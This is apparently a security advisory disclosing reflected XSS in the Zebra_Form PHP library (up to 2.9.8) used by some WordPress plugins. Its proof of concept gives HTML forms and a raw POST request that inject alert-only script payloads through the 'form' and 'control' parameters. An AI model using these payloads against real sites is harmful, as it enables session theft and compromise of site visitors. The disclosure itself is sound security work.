Zebra_Form Library <= 2.9.8 – Reflected Cross-Site Scripting (XSS)

Description

The Zebra_Form PHP library v2.9.8 (latest) and below, used by some WordPress plugins, is affected by reflected Cross-Site Scripting issues in its process.php file.

There is currently no patch available and the removal of this library is recommended.

Proof of Concept

Via $_GET['form']:<br/><br/>
<form action="https://example.com/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=</script><img src onerror=alert(/XSS-form/)>&control=upload" method="post" enctype="multipart/form-data">
    <input type="file" name="upload"/>
    <input type="submit" name="submit" value="Send">
</form>
<br/>

Via $_GET['control']:<br/><br/>
<form action="https://example.com/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=f&control=</script><svg/onload=alert(/XSS-control/)>" method="post" enctype="multipart/form-data">
    <input type="file" name="</script><svg/onload=alert(/XSS-control/)>"/>
    <input type="submit" name="submit" value="Send">
</form>

POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
Content-Length: 241
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------77916619616724262872902741074
Content-Disposition: form-data; name="upload"; filename="a.txt"
Content-Type: text/plain

Test

-----------------------------77916619616724262872902741074--